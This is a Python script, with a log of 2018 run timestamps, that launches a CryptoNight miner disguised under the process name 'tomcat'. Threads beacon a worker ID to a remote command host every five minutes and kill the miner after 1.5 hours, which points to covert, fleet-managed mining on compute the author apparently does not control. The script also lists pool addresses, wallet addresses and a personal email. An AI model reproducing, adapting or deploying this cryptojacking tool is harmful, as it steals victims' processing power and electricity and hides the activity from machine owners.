import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:05.332833
#2018-02-17 16:52:01.777797
#2018-02-17 18:40:08.480937
#2018-02-17 20:28:04.446758
#2018-02-17 22:14:06.768077
#2018-02-17 23:58:03.691008
#2018-02-18 01:49:01.865583
#2018-02-18 03:36:02.204215
#2018-02-18 05:23:07.411903
#2018-02-18 07:14:02.191716
#2018-02-18 09:02:03.541667
#2018-02-18 10:48:06.854530
#2018-02-18 12:36:01.860528
#2018-02-18 14:22:06.742181
#2018-02-18 16:13:05.874628
#2018-02-18 18:01:03.826673
#2018-02-18 19:47:06.899757
#2018-02-18 21:32:05.979552
#2018-02-18 23:21:05.043516
#2018-02-19 01:08:05.389279
#2018-02-19 02:54:04.458561
#2018-02-19 04:40:08.455476
#2018-02-19 06:24:03.940289
#2018-02-19 08:13:07.359306
#2018-02-19 10:03:05.592638
#2018-02-19 11:52:05.954223
#2018-02-19 13:40:09.088638
#2018-02-19 15:29:04.534520
#2018-02-19 17:17:09.840215
#2018-02-19 19:05:04.160208
#2018-02-19 20:49:06.085370
#2018-02-19 22:36:04.448786
#2018-02-20 00:22:05.619051
#2018-02-20 02:09:06.424119
#2018-02-20 03:59:07.361500
#2018-02-20 05:43:05.436175
#2018-02-20 07:30:01.528572
#2018-02-20 09:14:03.764908
#2018-02-20 10:56:05.567325
#2018-02-20 12:44:09.923980
#2018-02-20 14:28:06.545861
#2018-02-20 16:14:02.017553
#2018-02-20 18:02:06.445952
#2018-02-20 19:54:06.086813
#2018-02-20 21:40:07.900141
#2018-02-20 23:21:04.228035
#2018-02-21 01:05:05.587869
#2018-02-21 02:51:01.604138
#2018-02-21 04:38:06.166646
#2018-02-21 06:26:07.623498
#2018-02-21 08:10:13.933900
#2018-02-21 09:57:07.343655
#2018-02-21 11:44:08.408478
#2018-02-21 13:36:01.407435
#2018-02-21 15:19:09.480374
#2018-02-21 17:09:01.474799
#2018-02-21 18:56:08.018792
#2018-02-21 20:46:09.675629
#2018-02-21 22:31:06.578090
#2018-02-22 00:20:08.504670
#2018-02-22 02:09:04.927487
#2018-02-22 03:54:08.087445
#2018-02-22 05:40:08.590899
#2018-02-22 07:25:07.118668
#2018-02-22 09:12:02.103246
#2018-02-22 10:59:01.422893
#2018-02-22 12:44:01.526697
#2018-02-22 14:31:07.403367
#2018-02-22 16:19:04.318966
#2018-02-22 18:07:08.355775
#2018-02-22 19:55:01.392325
#2018-02-22 21:43:07.716603
#2018-02-22 23:31:06.354009
#2018-02-23 01:19:04.510192
#2018-02-23 03:05:03.789691
#2018-02-23 04:53:04.833420
#2018-02-23 06:39:01.499913
#2018-02-23 08:27:04.274074
#2018-02-23 10:43:06.300495
#2018-02-23 12:40:08.973890
#2018-02-23 14:23:07.068711
#2018-02-23 16:16:06.964588
#2018-02-23 18:03:07.297413
#2018-02-23 19:48:07.634972
#2018-02-23 21:33:07.559106
#2018-02-23 23:21:04.166987
#2018-02-24 01:14:02.108000
#2018-02-24 03:05:03.763139
#2018-02-24 04:51:01.915913
#2018-02-24 06:35:09.329351
#2018-02-24 08:24:07.406493
#2018-02-24 10:10:08.207949
#2018-02-24 12:05:01.510700
#2018-02-24 13:52:03.798112
#2018-02-24 15:44:04.880135
#2018-02-24 17:45:04.365591
#2018-02-24 19:29:06.550496
#2018-02-24 21:19:01.645571
#2018-02-24 23:57:07.015852
#2018-02-25 04:23:04.427054
#2018-02-25 07:54:01.254978